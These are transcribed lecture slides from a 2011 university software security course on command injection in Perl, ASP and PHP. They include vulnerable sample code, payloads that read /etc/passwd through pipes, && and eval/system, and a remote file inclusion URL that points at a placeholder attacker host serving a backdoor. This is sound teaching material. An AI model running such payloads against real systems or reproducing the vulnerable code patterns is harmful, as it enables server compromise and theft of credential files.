1. Software Security Lecture 4 Fang Yu Dept. of MIS, National Chengchi University Spring 2011

2. Outline  Today we will have Adam presenting how to attack authentications (Ch6)  Before his presentation, I will continue Command Injections (Ch9), and also I will present my recent research on how to prevent and remove injection vulnerabilities  The rest of your presentations have been scheduled. Please check the course web page and plan ahead. Let me know if you have any question.  The course website :  http://soslab.nccu.edu.tw/Courses.html http://soslab.nccu.edu.tw/Courses.html

3. Injecting Code II Chapter 9 The Web Application Hacker’s Handbook

4. Interpreted Languages  Recall that an interpreted language is one whose execution involved a runtime component that interprets the code of the language and carries out the instructions that it contains  For example, SQL, Perl, ASP, PHP, etc.

5. Interpreted Languages  In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user.  An attacker can supply crafted input that breaks out of the data context, usually by supplying some syntax that has a special significance within the grammar of the interpreted language.

6. Command Injection Attacks  Main problem: Incorrect or completely lack of validation of user input that results in the execution of commands on the server  We have discussed SQL injections last week. Today we will discuss OS command, Web scripting language, SOAP and SMTP injection attacks.

7. OS command: Injecting via Perl  Consider a Perl CGI Code that allows administrators to specify a directory and view a summary of its disk usages #!/usr/bin/perl use strict; use CGI qw(:standard escapeHTML); print header, start_html(“”); print “ ”; my $command = “du -h --exclude php* /var/www/html”; $command= $command.param(“dir”); $command=`$command`; print “$command\n”; print end_html;

8.  When used as intended:

9. Injecting via Perl  “|” is used to redirect the output of a process to the input of another process  This enables multiple commands to be chained together

10.  Inject code: (cat /etc/passwd)

11. OS Command: Injecting via ASP  Consider an ASP code that allows administrators to view the contents of a requested log file  type the log file  cmd executes the command <% Set oScript = Server.CreateObject(“WSCRIPT.SHELL”) Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”) szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”) szTempFile = “C:\“ & oFileSys.GetTempName() Call oScript.Run (“cmd.exe /c “ & szCMD & “ > “ & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) %>

12.  When used as intended: (submit last5.log)

13.  Use && to batch multiple commands together  Last5.log && dir c:\

14. Dynamic Execution Vulnerabilities  The PHP function eval() is used to dynamically execute code that is passed to the function at runtime  Consider a search function that enables users to create stored searches:  The server side implementation:  creating a mysearch variable with the value wahh https://wahh- app.com/search.php?storedsearch=\$myse arch%3dwahh $storedsearch = $_GET[‘storedsearch’]; eval(“$storedsearch;”);

15. Dynamic execution in PHP  The semicolon character can be used to batch commands together in a single parameter.  For example, to retrieve the contents of the file /etc/password, you could use either the file_get_contentsor the system command: https://wahh- app.com/search.php?storedsearch=\$mysearch%3 dwahh; %20echo%20file_get_contents(‘/etc/passwd’) https://wahh- app.com/search.php?storedsearch=\$mysearch%3 dwahh; %20system(‘cat%20/etc/passwd’)

16. File Inclusion Attacks  Consider an application that delivers different content to people in different locations  A request looks like:  The application processes as follows: https://wahh-app.com/main.php?Country=US $country = $_GET[‘Country’]; include( $country. ‘.php’ );

17. File Inclusion Attacks  If the request has been intercepted:  The sever side may include an arbitrary remote file https://wahh- app.com/main.php?Country=http://wahh- attacker.com/backdoor $country = $_GET[‘Country’]; include(http://wahh-attacker.com/backdoor.‘.php’ );

18. Quiz  What’s the main cause of injection vulnerabilities?  How to prevent injection vulnerabilities?  Let’s talk a little bit about Stranger

19. Next week  We will have Juilette presenting Attacking Session Management (Chapter 7), Jorina presenting Attacking Access Controls (Chapter 8)  We will also have Hsing Hunag presenting Burp Suite, a tool set for analyzing and attacking web applications